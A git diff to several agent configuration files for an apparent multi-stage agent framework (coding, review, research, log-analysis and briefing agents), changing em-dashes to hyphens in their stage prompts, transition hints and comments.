+hint = "Every hypothesis failed - the plan's premise is wrong, re-plan"
 transform = "compact"
 
 [stages.prototype.transitions.reassess]
 condition = "stuck"
 stuck_after_iterations = 12
 stuck_after_same_file_edits = 4
-hint = "The spike is going in circles — step back"
+hint = "The spike is going in circles - step back"
 transform = "direct"
 
 [stages.prototype.transitions.error_recovery]
@@ -246,37 +246,37 @@ You are implementing the plan from the `plan` region. Write working,
 production-quality code that matches the project's `conventions`.
 
 Follow the workflow the discover stage synthesized in `workflow`. It ends with
-three literal lines — BASELINE, VERIFY and DONE WHEN. Execute them:
+three literal lines - BASELINE, VERIFY and DONE WHEN. Execute them:
 
 1. BASELINE, before your FIRST edit. Run the BASELINE command with bash and
    context_write the result to `baseline`: which tests pass and which already
    fail. You cannot tell a regression from a pre-existing failure without this.
-   (TIER 1 / no runnable suite: write "no baseline — nothing to run yet" and
+   (TIER 1 / no runnable suite: write "no baseline - nothing to run yet" and
    build the verification the plan calls for as your first change.)
-2. Implement incrementally — one coherent file/change at a time, not one giant
+2. Implement incrementally - one coherent file/change at a time, not one giant
    dump. Use write_file to create files and edit_file to modify existing ones.
-   Do NOT edit files through bash — no `sed -i`, no `tee`, no `>`/`>>`
+   Do NOT edit files through bash - no `sed -i`, no `tee`, no `>`/`>>`
    redirection, no here-docs. Bash is for running tests and builds and for
    read-only exploration. Only write_file/edit_file are recorded in the
    `implementation` region the reviewer reads, and this stage will not hand off
    to review until at least one of them has landed.
    Handle errors explicitly (validate inputs, propagate/return errors, no silent
-   swallowing) — match the error-handling style already in this codebase.
+   swallowing) - match the error-handling style already in this codebase.
    Write or update tests alongside the code when the task warrants it.
 3. VERIFY after each logical change, not just at the end. Run the VERIFY command
    with bash; output is routed to `test_results`.
 4. Compare every VERIFY against `baseline`. If a test that passed in `baseline`
-   now fails, you broke it: say so explicitly — "I broke <test> with my change to
-   <file>, investigating" — and fix it before writing anything else. Never move
+   now fails, you broke it: say so explicitly - "I broke <test> with my change to
+   <file>, investigating" - and fix it before writing anything else. Never move
    on from a regression.
 5. Before finishing, run the full-suite command from `workflow` once.
 
 You are NOT done because most tests pass. You are done when DONE WHEN is met:
 the target tests pass AND nothing that passed in `baseline` fails now. If tests
-are still failing, say how many and keep going — do not stop early and do not
+are still failing, say how many and keep going - do not stop early and do not
 report success you haven't observed.
 
-If a test keeps failing, check the `errors` region — it keeps the recent failures
+If a test keeps failing, check the `errors` region - it keeps the recent failures
 so you can spot a repeating pattern instead of chasing the same wall.
 
 Do NOT spend iterations re-reading the codebase unless you need something
@@ -296,7 +296,7 @@ explicit statement that nothing regressed against `baseline`.
 #
 # write_file/edit_file confirmations persist in `implementation`, which makes it
 # the run's changelog: it is what the review stage is told to read, it survives
-# `conversation` eviction, and — being persisted context — it also satisfies the
+# `conversation` eviction, and - being persisted context - it also satisfies the
 # transition gate below after a daemon restart, when per-stage counters are gone.
 [stages.implement.tool_routing]
 default_region = "conversation"
@@ -325,7 +325,7 @@ condition = "stuck"
 stuck_after_iterations = 20
 stuck_after_minutes = 15
 stuck_after_same_file_edits = 5
-hint = "No forward progress — step back and reassess"
+hint = "No forward progress - step back and reassess"
 transform = "custom"
 # `custom`, not `compact`: a plain compact edge would summarize EVERY
 # stage-specific region including `test_results`, which is the raw evidence
@@ -361,15 +361,15 @@ Minor style nits don't warrant another implementation pass.
 """
 system_prompt = """
 You are reviewing the implementation. Verify it against the ORIGINAL task in the
-`task` region — not just against the plan (the plan can be wrong).
+`task` region - not just against the plan (the plan can be wrong).
 
 You review here; you do not repair. This stage has no write or edit tool and
-calling one is refused — report what you find and route back to `implement`,
+calling one is refused - report what you find and route back to `implement`,
 which is where changes are made and re-reviewed.
 
 1. Read the files that were created or modified (they are tracked in the
    `implementation` region; read_file for anything you need to confirm).
-2. Re-run the tests with bash — use the commands in `workflow`, which the
+2. Re-run the tests with bash - use the commands in `workflow`, which the
    implement stage was told to follow. Output goes to `test_results`. Don't
    approve on unverified claims that "tests pass".
 3. Diff what you just ran against `baseline`: anything that passed there and
@@ -382,8 +382,8 @@ which is where changes are made and re-reviewed.
    code quality/conventions.
 
 End with one of:
-  APPROVED — no significant issues
-  NEEDS CHANGES — <numbered list of specific required fixes>
+  APPROVED - no significant issues
+  NEEDS CHANGES - <numbered list of specific required fixes>
 """
 
 [stages.review.tool_permissions]
@@ -403,7 +403,7 @@ bash      = "test_results"
 # review conversation into a fix list, and clear scratch + test_results before
 # re-implementing so stale failures don't confuse the next pass.
 [stages.review.transitions.implement]
-hint = "Issues found — needs another implementation pass"
+hint = "Issues found - needs another implementation pass"
 transform = "custom"
 [stages.review.transitions.implement.transform_config]
 carry = ["architecture", "conventions", "task", "plan", "codebase", "discovery", "workflow", "baseline"]
@@ -416,7 +416,7 @@ condition = "error"
 transform = "direct"
 
 # ─── Stage 4b: Reassess ───────────────────────────────────────────────────────
-# Reached ONLY via a `stuck` edge (issue #106) — invisible during normal flow,
+# Reached ONLY via a `stuck` edge (issue #106) - invisible during normal flow,
 # exactly like error_recovery. Deliberately has NO write tools: the whole point
 # is to stop editing and start thinking. It reads the runtime's `stuck_report`
 # (which threshold tripped and why), finds the wrong assumption, and REPLACES
@@ -429,13 +429,13 @@ available_tools = ["read_file", "list_dir", "bash", "context_write", "context_ap
 max_iterations = 8
 max_revisits = 2
 system_prompt = """
-You are NOT here to write code — you have no write tools on purpose. You were
+You are NOT here to write code - you have no write tools on purpose. You were
 pulled out of implementation because you stopped making progress. The
 `stuck_report` region says which threshold tripped and why.
 
 Work through this in order:
 1. Re-read the ORIGINAL task in `task`. State in one sentence what "done" means.
-   Not what the plan says — what the task says. Check it against the DONE WHEN
+   Not what the plan says - what the task says. Check it against the DONE WHEN
    line in `workflow`.
 2. Separate what you have VERIFIED (a command you ran and an output you saw)
    from what you ASSUMED. `test_results`, `errors` and `implementation` are your
@@ -468,7 +468,7 @@ list_dir  = "codebase"
 bash      = "test_results"
 
 [stages.reassess.transitions.implement]
-hint = "Corrected plan in hand — retry implementation"
+hint = "Corrected plan in hand - retry implementation"
 transform = "custom"
 [stages.reassess.transitions.implement.transform_config]
 carry = ["discovery", "workflow", "architecture", "conventions", "task", "plan", "codebase", "implementation", "prototypes", "errors", "stuck_report"]
@@ -481,7 +481,7 @@ condition = "error"
 transform = "direct"
 
 # ─── Stage 5: Error recovery ──────────────────────────────────────────────────
-# Only reachable via error edges — invisible during normal flow.
+# Only reachable via error edges - invisible during normal flow.
 [stages.error_recovery]
 mode = "autonomous"
 model = { models = [{ provider = "anthropic", model = "claude-sonnet-5" }, { provider = "openai", model = "gpt-5.4-mini" }, { provider = "ollama", model = "qwen3.5:9b" }] }
@@ -507,7 +507,7 @@ default_region = "conversation"
 read_file = "codebase"
 
 [stages.error_recovery.transitions.implement]
-hint = "Error diagnosed — retry implementation"
+hint = "Error diagnosed - retry implementation"
 transform = "compact"
 
 # ─── Compaction ───────────────────────────────────────────────────────────────
@@ -518,12 +518,12 @@ model = "claude-sonnet-5"
 # ─── Context layout ───────────────────────────────────────────────────────────
 # Budgets are given as a percentage of the model's context window (issue #100),
 # with an absolute `max_tokens`/`threshold_tokens` guard-rail so the layout is
-# sensible on any model. Percentages are ceilings, not reservations — they may
+# sensible on any model. Percentages are ceilings, not reservations - they may
 # sum past 100% since regions rarely fill at once.
 [context.regions]
 # ── Inputs (pinned, stable, cacheable) ──
 task         = { kind = "pinned", budget = "2%", max_tokens = 4000, required = true, required_message = "Describe the coding task via --task (or the API/ACP task field)." }
-# Deterministic repo scan, run once at spawn — the discover stage starts from
+# Deterministic repo scan, run once at spawn - the discover stage starts from
 # facts instead of burning iterations on `ls`. `git ls-files` behaves identically
 # on POSIX and Windows shells; outside a git repo it fails and this is simply
 # left empty (non-fatal), and oversized output is trimmed to the budget.
@@ -535,7 +535,7 @@ conventions  = { kind = "pinned", budget = "2%", max_tokens = 3000, seed = { fil
 architecture = { kind = "pinned", budget = "3%", max_tokens = 6000, seed = { files = ["ARCHITECTURE.md", "DESIGN.md", "docs/ARCHITECTURE.md", "docs/architecture.md", "README.md"] } }
 plan         = { kind = "pinned", budget = "3%", max_tokens = 4000 }
 # Verified findings from a `prototype` spike: the assumption, the verdict, and
-# the command that settled it — including what was RULED OUT. Pinned so neither
+# the command that settled it - including what was RULED OUT. Pinned so neither
 # implement nor reassess redoes the spike.
 prototypes   = { kind = "pinned", budget = "4%", max_tokens = 6000 }
 # Written by the RUNTIME when a `stuck` edge fires (issue #106): which threshold

--- a/agents/daily-briefer/agent.leviath
+++ b/agents/daily-briefer/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "daily-briefer"
 version = "0.0.1"
-description = "Morning summary agent — gathers from local + web sources, prioritizes into a running index, and delivers a concise briefing"
+description = "Morning summary agent - gathers from local + web sources, prioritizes into a running index, and delivers a concise briefing"
 entry_stage = "collect"
 
 [tool_permissions]
@@ -28,8 +28,8 @@ what to watch). Check each source:
 - Focus on what's NEW/actionable, not a full dump.
 
 Collect raw items into `raw_data`. Don't analyze yet. For each item, append a
-one-line source note to `sources_index` (context_append): `[n] <source> — <what>
-— <date/time if known>`. If sent back to fill a specific gap, focus only on it.
+one-line source note to `sources_index` (context_append): `[n] <source> - <what>
+- <date/time if known>`. If sent back to fill a specific gap, focus only on it.
 """
 
 [stages.collect.tool_routing]
@@ -42,7 +42,7 @@ list_dir   = "raw_data"
 bash       = "raw_data"
 
 [stages.collect.transitions.prioritize]
-hint = "Sources checked — rank what was found"
+hint = "Sources checked - rank what was found"
 transform = "direct"
 
 [stages.collect.transitions.error_recovery]
@@ -66,20 +66,20 @@ system_prompt = """
 Triage everything in `raw_data` and write each kept item to the `priorities`
 region (context_append) as `<TIER> | <one-sentence summary> | <source ref>`,
 using these tiers:
-1. ACTION — needs a decision or response today
-2. UPDATE — significant change or news worth knowing
-3. FYI    — interesting but not urgent
+1. ACTION - needs a decision or response today
+2. UPDATE - significant change or news worth knowing
+3. FYI    - interesting but not urgent
 
 Drop noise, duplicates, and irrelevant items entirely (don't write them). If a
 critical configured source came back empty, consider one more collect pass.
 """
 
 [stages.prioritize.transitions.brief]
-hint = "Items prioritized — compose the briefing"
+hint = "Items prioritized - compose the briefing"
 transform = "compact"
 
 [stages.prioritize.transitions.collect]
-hint = "A critical source came back empty — gather more"
+hint = "A critical source came back empty - gather more"
 transform = "compact"
 
 [stages.prioritize.transitions.error_recovery]
@@ -97,7 +97,7 @@ system_prompt = """
 Write a concise daily briefing (write_file) from the `priorities` region, citing
 `sources_index` where relevant. Format:
 
-## Daily Briefing — [Date]
+## Daily Briefing - [Date]
 
 ### 🔴 Action Required
 (ACTION-tier items needing decisions/responses today)
@@ -130,7 +130,7 @@ prioritize with whatever was successfully collected.
 """
 
 [stages.error_recovery.transitions.prioritize]
-hint = "Recovered — triage what we have"
+hint = "Recovered - triage what we have"
 transform = "compact"
 
 [compaction]

--- a/agents/deep-researcher/agent.leviath
+++ b/agents/deep-researcher/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "deep-researcher"
 version = "0.0.1"
-description = "Thorough single-topic investigation — searches, follows citation chains, cross-checks claims, and produces a structured cited report"
+description = "Thorough single-topic investigation - searches, follows citation chains, cross-checks claims, and produces a structured cited report"
 entry_stage = "gather"
 
 # Read/search agent: writes only its final report.
@@ -24,7 +24,7 @@ max_iterations = 25
 max_revisits = 3
 system_prompt = """
 You are investigating the topic in the `query` region in DEPTH, within any bounds
-in `scope`. This is a single-topic deep dive — go for primary sources and
+in `scope`. This is a single-topic deep dive - go for primary sources and
 authoritative references, not a broad skim.
 
 - Run a focused first round of web_search calls across the distinct facets of the
@@ -32,9 +32,9 @@ authoritative references, not a broad skim.
   primary sources (papers, standards, official docs) over summaries. read_file for
   local documents. Raw content lands in `sources`.
 - For every source you actually use, append one bibliography line to
-  `sources_index` (context_append): `[n] <title> — <url/path> — <date> —
+  `sources_index` (context_append): `[n] <title> - <url/path> - <date> -
   credibility: <high/med/low + why>`.
-- Note citations worth chasing — the analyze stage can send you to follow them.
+- Note citations worth chasing - the analyze stage can send you to follow them.
 
 Once you have solid primary coverage of the core facets, hand off to analyze.
 """
@@ -77,7 +77,7 @@ Analyze the `sources` against `sources_index`. Be rigorous:
 1. Extract factual claims into `claims` (context_append), each with its source
    ref: `<claim> [n]`. Separate well-supported (multiple credible sources) from
    single-source or speculative.
-2. Record source disagreements in `contradictions` (context_write) — who claims
+2. Record source disagreements in `contradictions` (context_write) - who claims
    what, with refs. Never silently pick a side.
 3. Evaluate source quality and bias; note gaps and the specific citations worth
    chasing next.
@@ -87,7 +87,7 @@ hinges on a source you haven't read directly.
 """
 
 [stages.analyze.transitions.gather]
-hint = "Broad gaps — need new sources on specific sub-topics"
+hint = "Broad gaps - need new sources on specific sub-topics"
 transform = "compact"
 
 [stages.analyze.transitions.follow_citations]
@@ -95,7 +95,7 @@ hint = "A specific cited source should be pulled and read directly"
 transform = "compact"
 
 [stages.analyze.transitions.synthesize]
-hint = "Evidence is sufficient — write the report"
+hint = "Evidence is sufficient - write the report"
 transform = "compact"
 
 [stages.analyze.transitions.error_recovery]
@@ -118,7 +118,7 @@ directly (or web_search for it by title/author first), read it, and append the
 new material to `sources` plus a bibliography line to `sources_index`. Extract
 any new or corrected claims to `claims`. Then hand back to analyze.
 
-Stay focused on the flagged citations — this is a targeted deep read, not a new
+Stay focused on the flagged citations - this is a targeted deep read, not a new
 broad search.
 """
 
@@ -130,7 +130,7 @@ web_search = "sources"
 read_file  = "sources"
 
 [stages.follow_citations.transitions.analyze]
-hint = "Cited sources read — resume analysis"
+hint = "Cited sources read - resume analysis"
 transform = "compact"
 
 [stages.follow_citations.transitions.error_recovery]
@@ -150,11 +150,11 @@ following the citation/confidence rules in `format`. Structure:
 - Executive summary (key findings in 3-5 sentences, each with a confidence level)
 - Background and context
 - Findings organized by theme, every non-obvious claim carrying a [n] citation
-- Disagreements — pull these straight from `contradictions`; never drop a
+- Disagreements - pull these straight from `contradictions`; never drop a
   recorded conflict
 - Analysis and implications
 - Open questions
-- References — the numbered bibliography from `sources_index`
+- References - the numbered bibliography from `sources_index`
 
 Write for a technical audience. Be precise. Distinguish evidence from inference.
 """
@@ -177,7 +177,7 @@ material you do have.
 """
 
 [stages.error_recovery.transitions.analyze]
-hint = "Recovered — continue analysis"
+hint = "Recovered - continue analysis"
 transform = "compact"
 
 [compaction]

--- a/agents/log-analyzer/agent.leviath
+++ b/agents/log-analyzer/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "log-analyzer"
 version = "0.0.1"
-description = "Analyzes log files — identifies anomalies, trends, and error patterns via a scripted analyze⇄script loop, maintaining a severity-ranked findings index"
+description = "Analyzes log files - identifies anomalies, trends, and error patterns via a scripted analyze⇄script loop, maintaining a severity-ranked findings index"
 entry_stage = "ingest"
 
 [tool_permissions]
@@ -58,11 +58,11 @@ Decide what happens next:
 """
 system_prompt = """
 Analyze the log data for:
-1. Error patterns — recurring errors, error spikes, cascading failures
-2. Anomalies — unusual request rates, latency outliers, unexpected status codes
-3. Trends — gradual degradation, growing queue depths, memory creep
-4. Correlations — errors that co-occur, time-based patterns
-5. Security signals — auth failures, unusual access, injection attempts
+1. Error patterns - recurring errors, error spikes, cascading failures
+2. Anomalies - unusual request rates, latency outliers, unexpected status codes
+3. Trends - gradual degradation, growing queue depths, memory creep
+4. Correlations - errors that co-occur, time-based patterns
+5. Security signals - auth failures, unusual access, injection attempts
 
 Quantify everything (timestamps, counts, rates). For each finding, append to
 `findings` (context_append): `<SEVERITY> | <finding> | <evidence: counts/timestamps>`
@@ -82,7 +82,7 @@ hint = "Need a script to parse/filter/aggregate log data"
 transform = "compact"
 
 [stages.analyze.transitions.report]
-hint = "Analysis complete — ready to produce report"
+hint = "Analysis complete - ready to produce report"
 transform = "compact"
 
 [stages.analyze.transitions.error_recovery]
@@ -124,7 +124,7 @@ hint = "Refine or write another script"
 transform = "direct"
 
 [stages.script.transitions.analyze]
-hint = "Script results ready — return to analysis"
+hint = "Script results ready - return to analysis"
 transform = "compact"
 
 [stages.script.transitions.error_recovery]
@@ -138,7 +138,7 @@ model = { models = [{ provider = "anthropic", model = "claude-opus-5" }, { provi
 description = "Produce a structured analysis report with findings"
 available_tools = ["write_file", "read_file"]
 max_iterations = 10
-# Generating the final report — don't inject mid-run user messages into it.
+# Generating the final report - don't inject mid-run user messages into it.
 accepts_messages = false
 system_prompt = """
 Write a structured log analysis report (write_file) from the `findings` region,
@@ -151,7 +151,7 @@ structured by the `severity_index` tally. Include:
 - Recommendations (what to fix, what to monitor)
 - Appendix: key log excerpts and script outputs
 
-Be precise — timestamps, counts, percentages, specific log lines. The report's
+Be precise - timestamps, counts, percentages, specific log lines. The report's
 severity counts must match `severity_index`.
 """
 
@@ -173,7 +173,7 @@ return to analyze to continue with the data available.
 """
 
 [stages.error_recovery.transitions.analyze]
-hint = "Recovered — resume analysis"
+hint = "Recovered - resume analysis"
 transform = "compact"
 
 [compaction]

--- a/agents/parallel-fixer/agent.leviath
+++ b/agents/parallel-fixer/agent.leviath
@@ -25,13 +25,13 @@ max_iterations = 6
 max_revisits = 2
 system_prompt = """
 Work out how THIS project runs its tests. Do not fix anything, and do not run
-the full suite yet — the validate stage does that.
+the full suite yet - the validate stage does that.
 
-Start from what you already have — do not rediscover it:
+Start from what you already have - do not rediscover it:
 - `repo_files` holds the tracked file list (empty if this isn't a git repo).
 - `task` may already name the test command; if so, trust it and just confirm the
   single-test form.
-- If `CLAUDE.md`, `AGENTS.md` or `CONTRIBUTING.md` exist, read them — they
+- If `CLAUDE.md`, `AGENTS.md` or `CONTRIBUTING.md` exist, read them - they
   usually state the test command outright.
 
 Fill gaps with list_dir/read_file and read-only shell probes (e.g.
@@ -41,7 +41,7 @@ Write `discovery` (context_write): language, build system, test runner, where
 tests live, and the fixture conventions a fix would have to respect.
 
 Write `workflow` (context_write) ending with these two literal lines. The
-SINGLE-TEST line matters most — each parallel worker runs one test, not the
+SINGLE-TEST line matters most - each parallel worker runs one test, not the
 suite, and it is copied into every work item:
   SUITE: <command to run the whole test suite>
   SINGLE: <command to run ONE named test, with a placeholder for the name>
@@ -53,7 +53,7 @@ default_region = "conversation"
 shell = "scratch"
 
 [stages.discover.transitions.validate]
-hint = "Test commands known — run the suite and diagnose"
+hint = "Test commands known - run the suite and diagnose"
 transform = "direct"
 
 # ─── Stage 2: Validate ───────────────────────────────────────────────────────
@@ -66,7 +66,7 @@ available_tools = ["read_file", "read_files", "list_dir", "shell", "context_writ
 max_iterations = 20
 max_revisits = 2
 system_prompt = """
-DIAGNOSE ONLY — do NOT edit any files or fix anything here. The parallel workers
+DIAGNOSE ONLY - do NOT edit any files or fix anything here. The parallel workers
 do the fixing; your job is to run the tests read-only and describe the failures.
 
 Run the project's test suite with shell, using `workflow`'s SUITE command (the
@@ -104,7 +104,7 @@ on_worker_failure = "continue"
 split_prompt = """
 Read the `diagnosis` region and the SINGLE line of the `workflow` region.
 
-Output ONLY a JSON array — start with '[' and end with ']', no prose, no markdown
+Output ONLY a JSON array - start with '[' and end with ']', no prose, no markdown
 fences, nothing else. One work item per DISTINCT source file (group tests that
 share a file). Shape:
 
@@ -112,7 +112,7 @@ share a file). Shape:
 
 Every item MUST carry a "verify" field: the SINGLE-test command from `workflow`
 with the placeholder filled in for that item's test. Workers run their own
-blueprint and do NOT inherit this agent's context regions — the work item is all
+blueprint and do NOT inherit this agent's context regions - the work item is all
 they get, so a worker with no "verify" has no way to check its own fix.
 
 If `diagnosis` is exactly "NO FAILURES" (or lists none), output exactly: []
@@ -129,15 +129,15 @@ allow_as_worker = true
 system_prompt = """
 You are fixing ONE failing test. Your work item (test name, source file,
 diagnosis, and the `verify` command for this exact test) is in your pinned
-context — it is ALL the context you get, so work from it.
+context - it is ALL the context you get, so work from it.
 
 1. Read the test and the implicated source file.
-2. Make the MINIMAL edit that fixes the failure — don't refactor unrelated code.
+2. Make the MINIMAL edit that fixes the failure - don't refactor unrelated code.
 3. Run the work item's `verify` command to confirm this test now passes. Don't
    claim a fix you haven't run.
 4. Report exactly which file(s) you changed and what you changed.
 
-Only touch the source file for your work item — other workers are fixing other
+Only touch the source file for your work item - other workers are fixing other
 files in parallel.
 """
 
@@ -150,12 +150,12 @@ available_tools = ["read_file", "read_files", "edit_file", "shell", "context_app
 max_iterations = 30
 system_prompt = """
 The parallel workers' results are in your conversation context. Your job:
-1. Reconcile the fixes — if two touched related code, make them consistent.
+1. Reconcile the fixes - if two touched related code, make them consistent.
 2. Run the full test suite once, using `workflow`'s SUITE command.
 3. Record what changed in the `fixes` region (context_append): one line per file
    touched and the net effect.
 
-Don't chase every remaining failure here — the verify stage decides whether
+Don't chase every remaining failure here - the verify stage decides whether
 another parallel round is needed. Just make the fixes coherent and report state.
 """
 
@@ -165,7 +165,7 @@ default_region = "conversation"
 shell = "test_results"
 
 [stages.merge_fixes.transitions.verify]
-hint = "Fixes reconciled — verify the full suite"
+hint = "Fixes reconciled - verify the full suite"
 transform = "compact"
 
 # ─── Stage 5: Verify ─────────────────────────────────────────────────────────
@@ -198,7 +198,7 @@ default_region = "conversation"
 shell = "test_results"
 
 [stages.verify.transitions.validate]
-hint = "Failures remain — re-diagnose and fan out another round"
+hint = "Failures remain - re-diagnose and fan out another round"
 transform = "compact"
 
 # ─── Compaction ──────────────────────────────────────────────────────────────
@@ -209,7 +209,7 @@ model = "claude-sonnet-5"
 # ─── Context layout ──────────────────────────────────────────────────────────
 [context.regions]
 task         = { kind = "pinned", budget = "3%", max_tokens = 4000, required = true, seed = "task", required_message = "Describe what to fix via --task. The discover stage works out how to run the tests, so you no longer have to spell that out here." }
-# Deterministic repo scan, run once at spawn (issue #108) — the discover stage
+# Deterministic repo scan, run once at spawn (issue #108) - the discover stage
 # starts from facts instead of burning iterations on `ls`. `git ls-files` behaves
 # identically on POSIX and Windows shells; outside a git repo it fails and this is
 # simply left empty (non-fatal), and oversized output is trimmed to the budget.

--- a/agents/researcher/agent.leviath
+++ b/agents/researcher/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "researcher"
 version = "0.0.1"
-description = "Research assistant — gather, analyze, and summarize with a gather↔analyze refinement loop, error recovery, and multi-provider fallback"
+description = "Research assistant - gather, analyze, and summarize with a gather↔analyze refinement loop, error recovery, and multi-provider fallback"
 entry_stage = "gather"
 
 # Read/search agent: it gathers and synthesizes, writing only its final report.
@@ -26,18 +26,18 @@ system_prompt = """
 You are gathering source material on the topic in the `query` region, within any
 bounds set in `scope`.
 
-Be efficient — do not search exhaustively:
+Be efficient - do not search exhaustively:
 1. Run a FOCUSED first round of 3-5 web_search calls covering the distinct
    sub-topics of the question (not many rephrasings of the same query).
 2. web_fetch only the 2-3 most promising sources for detail; the search snippets
    in `raw_findings` are usually enough on their own.
 3. As you go, append one bibliography line per source you actually use to the
    `sources_index` region with context_append:
-   `[n] <title> — <url or path> — credibility: <high/med/low + why>`.
+   `[n] <title> - <url or path> - credibility: <high/med/low + why>`.
 
 Prefer primary sources and well-established outlets; note when something is a blog,
 forum, or vendor claim. Once you have solid coverage of the sub-topics, transition
-to analyze — don't keep searching for marginal additions. The analyze stage will
+to analyze - don't keep searching for marginal additions. The analyze stage will
 send you back if it finds a real gap.
 """
 
@@ -73,7 +73,7 @@ Analyze the `raw_findings` against the `sources_index`. Do three things:
 1. Extract factual claims into the `claims` region (context_append), each with its
    source reference: `<claim> [n]`. These are what the summary is built from.
 2. When sources DISAGREE, record the conflict in `contradictions` (context_write)
-   — who claims what, with source refs. Don't silently pick a side; surface it.
+   - who claims what, with source refs. Don't silently pick a side; surface it.
 3. Judge strength: separate well-supported claims (multiple credible sources) from
    single-source or speculative ones.
 
@@ -89,7 +89,7 @@ hint = "More information needed on specific sub-topics"
 transform = "compact"
 
 [stages.analyze.transitions.summarize]
-hint = "Analysis complete — ready to summarize"
+hint = "Analysis complete - ready to summarize"
 transform = "compact"
 
 [stages.analyze.transitions.error_recovery]
@@ -109,10 +109,10 @@ Write the research report (write_file), built from the `claims` region and citin
 
 Structure:
 - Key findings organized by theme, each with a confidence level.
-- Notable disagreements — pull these straight from the `contradictions` region;
+- Notable disagreements - pull these straight from the `contradictions` region;
   never drop a recorded conflict.
 - Open questions.
-- Sources — the numbered bibliography from `sources_index`.
+- Sources - the numbered bibliography from `sources_index`.
 
 Keep it tight and skimmable. Every non-obvious claim must carry a [n] citation.
 """
@@ -135,7 +135,7 @@ back to analyze to continue with whatever material is available.
 """
 
 [stages.error_recovery.transitions.analyze]
-hint = "Recovered — continue analysis"
+hint = "Recovered - continue analysis"
 transform = "compact"
 
 [compaction]
@@ -146,7 +146,7 @@ model = "claude-sonnet-5"
 # Budgets are a percentage of the model's context window (issue #100) with an
 # absolute `max_tokens`/`threshold_tokens` guard-rail. Percentages are ceilings.
 [context.regions]
-# The research question — required. Supplied via --task (or the API/ACP task field).
+# The research question - required. Supplied via --task (or the API/ACP task field).
 query          = { kind = "pinned", budget = "1%", max_tokens = 1000, required = true, seed = "task", required_message = "State the research question via --task." }
 # Optional caller bounds: --scope "peer-reviewed sources since 2020 only".
 scope          = { kind = "pinned", budget = "1%", max_tokens = 1000, seed = "scope" }
@@ -165,7 +165,7 @@ contradictions = { kind = "clearable",      budget = "3%", max_tokens = 3000 }
 synthesis         = { kind = "compacting",      budget = "40%", compact_at = "80%", threshold_tokens = 30000, max_tokens = 50000 }
 synthesis_history = { kind = "compact_history", source_region = "synthesis", budget = "3%", max_tokens = 10000 }
 
-# The message stream. An explicit sliding_window `conversation` region is required —
+# The message stream. An explicit sliding_window `conversation` region is required -
 # the per-stage layout is rebuilt from this table on each transition, so an
 # auto-added one would be dropped after the first stage.
 conversation      = { kind = "sliding_window", max_items = 30, budget = "12%", max_tokens = 15000, strategy = "bulk", overflow = 10 }

--- a/agents/reviewer/agent.leviath
+++ b/agents/reviewer/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "reviewer"
 version = "0.0.1"
-description = "Code review agent — discover, scan, deep review, and report with error recovery and multi-provider fallback"
+description = "Code review agent - discover, scan, deep review, and report with error recovery and multi-provider fallback"
 entry_stage = "discover"
 
 # Read-only agent: it inspects a diff/codebase and reports. No write access.
@@ -25,11 +25,11 @@ system_prompt = """
 Before reviewing anything, work out what this project is and how a claim about it
 can be CHECKED rather than asserted. Do not review the diff here.
 
-Start from what you already have — do not rediscover it:
+Start from what you already have - do not rediscover it:
 - `repo_files` holds the tracked file list (empty if this isn't a git repo).
 - `project_context` is pre-loaded with architecture/conventions docs.
 - If `CLAUDE.md`, `AGENTS.md`, `CONTRIBUTING.md` or
-  `.github/copilot-instructions.md` exist, read them — they usually state the
+  `.github/copilot-instructions.md` exist, read them - they usually state the
   test command and the review bar directly.
 
 Fill gaps with list_dir/read_file. Use bash ONLY read-only, to interrogate the
@@ -42,12 +42,12 @@ project actually holds itself to (which is what "correct" means in the review).
 
 Write `workflow` (context_write) ending with these two literal lines, which the
 deep review uses to confirm hypotheses instead of guessing:
-  VERIFY: <command to run one test or check, or "none — no runnable suite">
+  VERIFY: <command to run one test or check, or "none - no runnable suite">
   DONE WHEN: <what makes this review complete and trustworthy>
 """
 
 [stages.discover.transitions.scan]
-hint = "Project mapped — begin the review"
+hint = "Project mapped - begin the review"
 transform = "direct"
 
 [stages.discover.transitions.error_handler]
@@ -67,13 +67,13 @@ surrounding context). Honor any focus in `review_criteria`, and use `discovery`
 (this project's layout and conventions, mapped by the discover stage) plus
 `project_context` to judge what "correct" means here.
 
-Flag the obvious red flags — don't go deep yet:
+Flag the obvious red flags - don't go deep yet:
 - Security: injection, unsafe deserialization, secrets in code, missing authz.
 - Correctness smells: unhandled errors, nil/None derefs, off-by-one, dead code.
 - Missing input validation, TODO/FIXME markers, and anything that looks risky.
 
 Append the flagged areas (file + one line each) to the `findings` region via
-context_append — this is the worklist the deep review scrutinizes.
+context_append - this is the worklist the deep review scrutinizes.
 """
 
 # Passive reads go to `findings`; everything else stays in conversation.
@@ -84,7 +84,7 @@ read_file = "findings"
 list_dir  = "findings"
 
 [stages.scan.transitions.deep_review]
-hint = "First pass complete — scrutinize the flagged areas"
+hint = "First pass complete - scrutinize the flagged areas"
 transform = "direct"
 
 [stages.scan.transitions.error_handler]
@@ -102,15 +102,15 @@ max_revisits = 2
 system_prompt = """
 Scrutinize the flagged areas in depth. Work the review through a fixed framework so
 nothing is skipped:
-  1. Correctness — does it do what the task/diff intends? Trace the logic.
-  2. Security — injection, authz, secret handling, unsafe input.
-  3. Performance — hot-path allocations, N+1 queries, needless work.
-  4. Maintainability — clarity, naming, duplication, conventions.
-  5. Test coverage — are the risky paths actually tested?
+  1. Correctness - does it do what the task/diff intends? Trace the logic.
+  2. Security - injection, authz, secret handling, unsafe input.
+  3. Performance - hot-path allocations, N+1 queries, needless work.
+  4. Maintainability - clarity, naming, duplication, conventions.
+  5. Test coverage - are the risky paths actually tested?
 
 For each finding give: location, the concrete failure scenario (inputs/state →
 wrong result or crash), a severity (critical / warning / info), and a recommended
-fix. Recommend it — do not apply it. This agent reads and judges; no stage here
+fix. Recommend it - do not apply it. This agent reads and judges; no stage here
 has a tool that writes or edits a file, and calling one is refused. Append each finding to `findings` (context_append).
 
 Keep a running tally in the `severity_index` region: rewrite it with
@@ -118,7 +118,7 @@ context_write each time the counts change, e.g. "critical: 2, warning: 5, info: 
 This survives even if the finding detail is compacted, so the report stage always
 has the totals.
 
-Use bash only to CONFIRM a hypothesis, never to modify anything — `workflow`'s
+Use bash only to CONFIRM a hypothesis, never to modify anything - `workflow`'s
 VERIFY line holds the command this project actually uses to run one test. A
 finding you were able to check beats one you reasoned your way to; say which it
 is. Hold the review to `workflow`'s DONE WHEN line.
